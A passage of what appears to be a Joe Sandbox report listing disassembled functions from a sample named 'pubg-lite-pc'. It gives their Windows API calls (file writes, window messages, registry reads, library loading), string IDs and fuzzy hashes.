                                                                                                • API String ID: 2080323225-2407441175
                                                                                                • Opcode ID: 51296825697df3dce7c44fa7758ba7ef4dc311250d45b06cb3d0d52754c8ea43
                                                                                                • Instruction ID: 5d0ffd5b0e05f9f7eee513d46d042adcccb380d1e688991de8fa1847337cda25
                                                                                                • Opcode Fuzzy Hash: 51296825697df3dce7c44fa7758ba7ef4dc311250d45b06cb3d0d52754c8ea43
                                                                                                • Instruction Fuzzy Hash: DB51B071D04B449BDB20CF69C9456AAFBF8FF58710F008A5DE89597690EB70B984CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00935740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 147fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?), ref: 00935883
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009358CC
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00935930
                                                                                                • CloseHandle.KERNEL32(00000000,?), ref: 00935956
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateVariableWakeWrite
                                                                                                • String ID: aix$html
                                                                                                • API String ID: 2883614012-2369804267
                                                                                                • Opcode ID: a4c66c1d8bc15854551b83e059e21ac23d49d08c94970183d6059799a031c10f
                                                                                                • Instruction ID: 6c3843e07a3185d51c218f4690517b05f89730ac699bb447c0fdce8def367f28
                                                                                                • Opcode Fuzzy Hash: a4c66c1d8bc15854551b83e059e21ac23d49d08c94970183d6059799a031c10f
                                                                                                • Instruction Fuzzy Hash: 05519BB0900384EFDB10CF94DD89B9EBBF8BB55B18F144199E001AB291DBB55A09CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0095C980 Relevance: 10.6, APIs: 7, Instructions: 144windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(00000000), ref: 0095C9F5
                                                                                                • GetParent.USER32(00000000), ref: 0095CA01
                                                                                                • GetParent.USER32(00000000), ref: 0095CA06
                                                                                                • SendMessageW.USER32(00000000,0000037F,00000000,?), ref: 0095CA1C
                                                                                                • SendMessageW.USER32(00000000,00000087,00000000,00000000), ref: 0095CA50
                                                                                                • SendMessageW.USER32(00000000,00000087,00000000,00000000), ref: 0095CAB2
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0095CABB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageParentSend$LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2933145521-0
                                                                                                • Opcode ID: 082e13599cc071717e5d9590638850d42ae2372399ba046a72311a22ef8d47b7
                                                                                                • Instruction ID: cd7eee898803741223140d2fa4cffd621aabc01bba41244f418e39d48883cb6f
                                                                                                • Opcode Fuzzy Hash: 082e13599cc071717e5d9590638850d42ae2372399ba046a72311a22ef8d47b7
                                                                                                • Instruction Fuzzy Hash: 5241C0B56003099FEB25DF26CC88BBA7BA8EF51352F244075ED059B290DB34DC49CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097F88C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,Anchor Color,00000000,?,?,00000018,80000001,Software\Microsoft\Internet Explorer\Settings,0002001F,00000001,?,?,00000001), ref: 0097F9B2
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,Anchor Color Visited,00000000,?,?,00000018,?,?,00000001), ref: 0097FA20
                                                                                                • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Internet Explorer\Settings,0002001F,00000001,?,?,00000001), ref: 0097FA76
                                                                                                Strings
                                                                                                • Anchor Color, xrefs: 0097F9AC
                                                                                                • Anchor Color Visited, xrefs: 0097FA1A
                                                                                                • Software\Microsoft\Internet Explorer\Settings, xrefs: 0097F95F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: QueryValue$Close
                                                                                                • String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings
                                                                                                • API String ID: 1979452859-3433146436
                                                                                                • Opcode ID: b6727dfc59277e2d2fa9151ce0e4604f3f7a8360548f412cfacb21de2c3d22ee
                                                                                                • Instruction ID: fda23dc7d75df7bc9f2f4fe12efaba0e2af694db6acc6cdf54fc16315bafed0e
                                                                                                • Opcode Fuzzy Hash: b6727dfc59277e2d2fa9151ce0e4604f3f7a8360548f412cfacb21de2c3d22ee
                                                                                                • Instruction Fuzzy Hash: 0F414F32A01619EAEB24CF14CD64BEAB3B9FF45704F1086A9E909B3280D7709E85CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097FC80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(Advapi32.dll,F4D3B90A,?,?,?,?,?,Function_001484E0,000000FF,?,009AFA5F,?,?,000000FF), ref: 0097FCC3
                                                                                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0097FCEC
                                                                                                • RegOpenKeyExW.ADVAPI32(?,F4D3B90A,00000000,?,00000000,F4D3B90A,?,?,?,?,?,Function_001484E0,000000FF,?,009AFA5F,?), ref: 0097FD25
                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,Function_001484E0,000000FF,?,009AFA5F,?,?,000000FF), ref: 0097FD38
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressCloseHandleModuleOpenProc
                                                                                                • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                • API String ID: 823179699-3913318428
                                                                                                • Opcode ID: 8be6c2ca10e8e29683a7681bc7064886108d03b0bc13af5a2c0e65ea8ec2d396
                                                                                                • Instruction ID: f369faa3d6a4f72546375b10f97621ce38dbc97937d64cafdf7b0cfc0774403a
                                                                                                • Opcode Fuzzy Hash: 8be6c2ca10e8e29683a7681bc7064886108d03b0bc13af5a2c0e65ea8ec2d396
                                                                                                • Instruction Fuzzy Hash: 69217172704209EFDB25CF49DC54BAAB7ACFB48710F10853AF919E7290DB75A810CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097F290 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32 ref: 0097F2C8
                                                                                                • SendMessageW.USER32(00000000,0000004E,00000000,?), ref: 0097F2DE
                                                                                                • GetParent.USER32(?), ref: 0097F2FA
                                                                                                • SendMessageW.USER32(00000000,00000111,?,?), ref: 0097F317
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageParentSend
                                                                                                • String ID: open
                                                                                                • API String ID: 928151917-2758837156
                                                                                                • Opcode ID: d142f39e263a9b75ba0d2d2098c4782cd76c434762fd56f44b34e10123b3bec3
                                                                                                • Instruction ID: 1b9c39500c4ff81e61c421e9ea945d63dfe5886e9cdf13a441115dd41ce6e0a3
                                                                                                • Opcode Fuzzy Hash: d142f39e263a9b75ba0d2d2098c4782cd76c434762fd56f44b34e10123b3bec3
                                                                                                • Instruction Fuzzy Hash: DF212B3A604340EBD7105F58EC89BE97FA5FB88321F588459FD48DB292C775C809DB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EFFA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,00000000,009D5361,00000000,F4D3B90A,?,?,00000000), ref: 009EFFBB
                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 009EFFD1
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009F000A
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,009D5361,00000000,F4D3B90A,?,?,00000000), ref: 009F0026
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Free$AddressLoadProc
                                                                                                • String ID: DllGetVersion$Shlwapi.dll
                                                                                                • API String ID: 1386263645-2240825258
                                                                                                • Opcode ID: f629b534d3eb4153f8c4163e9b5c073885a9ee844555abecfaffc9d42abbec62
                                                                                                • Instruction ID: 34c8fb3de3160dbfc9d223e2a45c0a95b9bfb3138a01c56e665b272a978bae5a
                                                                                                • Opcode Fuzzy Hash: f629b534d3eb4153f8c4163e9b5c073885a9ee844555abecfaffc9d42abbec62
                                                                                                • Instruction Fuzzy Hash: 9E21BE76A007058BC710EF29A985A7BB7E8BFD9701F88052EF549C2242EF21980587A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A58118 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 0-537541572
                                                                                                • Opcode ID: 0e6d492f0f1fdcc7fdaee7d2986743aeb15b6ee00480dd575ed30b294e198c26
                                                                                                • Instruction ID: f37a87adedde581a9791c5cb937fb0f626f6d7a7b85a333a57af9eb3e232adba
                                                                                                • Opcode Fuzzy Hash: 0e6d492f0f1fdcc7fdaee7d2986743aeb15b6ee00480dd575ed30b294e198c26
                                                                                                • Instruction Fuzzy Hash: BA21E731A41A21ABDB21CB65DC85A5A3768BF01762F240711ED06BB2D2DF74DD0AC7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A42A9E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A42B16,00A42A7C,00A42D1A), ref: 00A42AB5
                                                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A42ACB
                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A42AE0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleModule
                                                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                • API String ID: 667068680-1718035505
                                                                                                • Opcode ID: 3aee8d028383ea0b0246a8ddc3510b204f9c47b414aad75999f96c291afb060f
                                                                                                • Instruction ID: d3d3479a2acf4e41b5db4803a9782e01c1b79bc329a4688b5bf7d06e381826c0
                                                                                                • Opcode Fuzzy Hash: 3aee8d028383ea0b0246a8ddc3510b204f9c47b414aad75999f96c291afb060f
                                                                                                • Instruction Fuzzy Hash: 3DF096397812229B8F33CFA55C887AA37D8EBC5395394883AFE01D3241DB51CC4AC7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A45A17 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                • LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                • RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                • SetEvent.KERNEL32(?,00B0345C,00A9C710), ref: 00A45AD5
                                                                                                • ResetEvent.KERNEL32(?,00B0345C,00A9C710), ref: 00A45AE1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3916383385-1809401727
                                                                                                • Opcode ID: 809c9de3a135c347f40802ee995afe0f5410c72926cfcd6aaa350cca7a84d810
                                                                                                • Instruction ID: fcdbb101907da32ec252e4c2552fdebb761448e26220b9006a4c4f6b6c71bfbd
                                                                                                • Opcode Fuzzy Hash: 809c9de3a135c347f40802ee995afe0f5410c72926cfcd6aaa350cca7a84d810
                                                                                                • Instruction Fuzzy Hash: 02011939A01620DBCB16EFA8FD4C9A87BB5EB49711701406AE90287371CF715C4ADBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0096FB00 Relevance: 9.2, APIs: 6, Instructions: 245windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001202,00000000,00000000), ref: 0096FBC0
                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0096FBFF
                                                                                                • SendMessageW.USER32(00000000,00001202,00000000,00000000), ref: 0096FC13
                                                                                                • SendMessageW.USER32(?,0000120A,00000000,00000007), ref: 0096FDA1
                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0096FDB3
                                                                                                • SendMessageW.USER32(00000000,0000120A,00000000,00000007), ref: 0096FDE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: da9504f9e465db1620c3f7e3e288ce8aae4d8a59fd057f8563463b8711385920
                                                                                                • Instruction ID: 4eab16dee56e4872b2bda26074d30d9828d7276a0a99acf399d7b50262226779
                                                                                                • Opcode Fuzzy Hash: da9504f9e465db1620c3f7e3e288ce8aae4d8a59fd057f8563463b8711385920
                                                                                                • Instruction Fuzzy Hash: 4DA18A71A00609EFDB14DFA8DD95BEEFBB5FF54304F108229E415AB281EB70A945CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0096DA50 Relevance: 9.2, APIs: 6, Instructions: 181windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0096DAC6
                                                                                                • SendMessageW.USER32(?,000000F1,-00000001,00000000), ref: 0096DADC
                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0096DAE9
                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0096DAFF
                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0096DB3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 573554fe1b59425146a211a70cd911cd28c7f5216c1a2bb12251ba46b1c0338a
                                                                                                • Instruction ID: a6d5104a5796fd0df7c2f5eb7c6f095fbcbf4107a668b6dc713aa4cd7006f3fb
                                                                                                • Opcode Fuzzy Hash: 573554fe1b59425146a211a70cd911cd28c7f5216c1a2bb12251ba46b1c0338a
                                                                                                • Instruction Fuzzy Hash: 22715A70A01258EFEB24DB64CD95BEDBBB5BF44304F104199E519AB2D1DBB06E44CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0094B690 Relevance: 9.2, APIs: 6, Instructions: 178windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 0094B6F7
                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0094B71F
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094B737
                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0094B768
                                                                                                • GetParent.USER32(?), ref: 0094B844
                                                                                                • SendMessageW.USER32(00000000,00000136,?,?), ref: 0094B855
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 1020955656-0
                                                                                                • Opcode ID: 3a54d03095073ce6953585c62817cd77d06d5b87594dcbf9a0112fc79f028797
                                                                                                • Instruction ID: 120ab051b5a9031b2d88e19a6dc6200b6d789f79db2485b6ad10c9d7301b055d
                                                                                                • Opcode Fuzzy Hash: 3a54d03095073ce6953585c62817cd77d06d5b87594dcbf9a0112fc79f028797
                                                                                                • Instruction Fuzzy Hash: 37612B72900218AFDB119FE4DD49FEEBBBAFF58710F140119F619AB290DB71A900CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00996220 Relevance: 9.2, APIs: 6, Instructions: 155windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001036,00010000,00000000), ref: 0099628B
                                                                                                • GetParent.USER32(00000000), ref: 009962DE
                                                                                                • GetWindowRect.USER32(00000000), ref: 009962E1
                                                                                                • GetParent.USER32(00000000), ref: 009962F0
                                                                                                  • Part of subcall function 00950F70: GetWindowRect.USER32(?,?), ref: 00951030
                                                                                                  • Part of subcall function 00950F70: GetWindowRect.USER32(?,?), ref: 00951048
